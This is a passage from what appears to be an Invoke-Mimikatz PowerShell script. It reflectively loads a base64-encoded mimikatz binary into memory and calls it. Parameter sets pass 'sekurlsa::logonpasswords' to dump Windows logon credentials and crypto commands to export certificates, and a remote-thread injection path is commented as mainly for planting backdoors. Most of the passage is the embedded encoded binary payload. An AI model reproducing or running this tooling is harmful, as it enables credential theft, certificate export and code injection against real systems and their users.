-ErrorAction Stop } #Determine whether or not to use 32bit or 64bit bytes if ([System.Runtime.InteropServices.Marshal]::SizeOf([Type][IntPtr]) -eq 8) { [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes64) } else { [Byte[]]$PEBytes = [Byte[]][Convert]::FromBase64String($PEBytes32) } $PEBytes[0] = 0 $PEBytes[1] = 0 $PEHandle = [IntPtr]::Zero if ($RemoteProcHandle -eq [IntPtr]::Zero) { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs } else { $PELoadedInfo = Invoke-MemoryLoadLibrary -PEBytes $PEBytes -ExeArgs $ExeArgs -RemoteProcHandle $RemoteProcHandle } if ($PELoadedInfo -eq [IntPtr]::Zero) { Throw "Unable to load PE, handle returned is NULL" } $PEHandle = $PELoadedInfo[0] $RemotePEHandle = $PELoadedInfo[1] #only matters if you loaded in to a remote process #Check if EXE or DLL. If EXE, the entry point was already called and we can now return. If DLL, call user function. $PEInfo = Get-PEDetailedInfo -PEHandle $PEHandle -Win32Types $Win32Types -Win32Constants $Win32Constants if (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -eq [IntPtr]::Zero)) { ######################################### ### YOUR CODE GOES HERE ######################################### Write-Verbose "Calling function with WString return type" [IntPtr]$WStringFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "powershell_reflective_mimikatz" if ($WStringFuncAddr -eq [IntPtr]::Zero) { Throw "Couldn't find function address." } $WStringFuncDelegate = Get-DelegateType @([IntPtr]) ([IntPtr]) $WStringFunc = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WStringFuncAddr, $WStringFuncDelegate) # NOTE: this is the point where the exe arguments are written to the binary write-verbose "ExeArgs: $ExeArgs " $WStringInput = [System.Runtime.InteropServices.Marshal]::StringToHGlobalUni($ExeArgs) write-verbose "WStringInput: $WStringInput " [IntPtr]$OutputPtr = $WStringFunc.Invoke($WStringInput) [System.Runtime.InteropServices.Marshal]::FreeHGlobal($WStringInput) if ($OutputPtr -eq [IntPtr]::Zero) { Throw "Unable to get output, Output Ptr is NULL" } else { $Output = [System.Runtime.InteropServices.Marshal]::PtrToStringUni($OutputPtr) Write-Output $Output $Win32Functions.LocalFree.Invoke($OutputPtr); } ######################################### ### END OF YOUR CODE ######################################### } #For remote DLL injection, call a void function which takes no parameters elseif (($PEInfo.FileType -ieq "DLL") -and ($RemoteProcHandle -ne [IntPtr]::Zero)) { $VoidFuncAddr = Get-MemoryProcAddress -PEHandle $PEHandle -FunctionName "VoidFunc" if (($VoidFuncAddr -eq $null) -or ($VoidFuncAddr -eq [IntPtr]::Zero)) { Throw "VoidFunc couldn't be found in the DLL" } $VoidFuncAddr = Sub-SignedIntAsUnsigned $VoidFuncAddr $PEHandle $VoidFuncAddr = Add-SignedIntAsUnsigned $VoidFuncAddr $RemotePEHandle #Create the remote thread, don't wait for it to return.. This will probably mainly be used to plant backdoors $RThreadHandle = Invoke-CreateRemoteThread -ProcessHandle $RemoteProcHandle -StartAddress $VoidFuncAddr -Win32Functions $Win32Functions } #Don't free a library if it is injected in a remote process if ($RemoteProcHandle -eq [IntPtr]::Zero) { Invoke-MemoryFreeLibrary -PEHandle $PEHandle } else { #Just delete the memory allocated in PowerShell to build the PE before injecting to remote process $Success = $Win32Functions.VirtualFree.Invoke($PEHandle, [UInt64]0, $Win32Constants.MEM_RELEASE) if ($Success -eq $false) { Write-Warning "Unable to call VirtualFree on the PE's memory. Continuing anyways." -WarningAction Continue } } Write-Verbose "Done!" } Main } #Main function to either run the script locally or remotely Function Main { if (($PSCmdlet.MyInvocation.BoundParameters["Debug"] -ne $null) -and $PSCmdlet.MyInvocation.BoundParameters["Debug"].IsPresent) { $DebugPreference = "Continue" } Write-Verbose "PowerShell ProcessID: $PID" if ($PsCmdlet.ParameterSetName -ieq "DumpCreds") { $ExeArgs = "sekurlsa::logonpasswords exit" } elseif ($PsCmdlet.ParameterSetName -ieq "DumpCerts") { $ExeArgs = "crypto::cng crypto::capi `"crypto::certificates /export`" `"crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE`" exit" } else { $ExeArgs = $Command } [System.IO.Directory]::SetCurrentDirectory($pwd) $PEBytes64 = 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